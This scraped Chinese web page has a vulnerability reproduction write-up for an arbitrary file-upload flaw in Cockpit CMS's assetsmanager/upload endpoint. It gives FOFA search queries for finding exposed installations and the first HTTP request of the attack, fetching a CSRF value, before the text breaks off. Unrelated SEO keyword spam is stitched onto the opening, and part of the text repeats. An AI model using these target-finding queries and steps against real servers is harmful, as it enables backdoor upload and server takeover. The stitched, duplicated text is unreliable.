网站网页设计中怎么添加页码信息,什么网站可以做电子画册,网站开发终止协议书,企业seo解决方案0x01 产品简介
Cockpit 是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。
0x02 漏洞概述
Cockpit assetsmanager/upload接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
0x0…0x01 产品简介
Cockpit是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。
0x02 漏洞概述
Cockpitassetsmanager/upload接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
0x03 复现环境
FOFA:
title="Authenticate Please!" || body="password:this.refs.password.value" || body="UIkit.components.formPassword.prototype.defaults.lblShow" || body="App.request('/auth/check'" 0x04 漏洞复现
获取csfr值
GET /auth/login?to=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
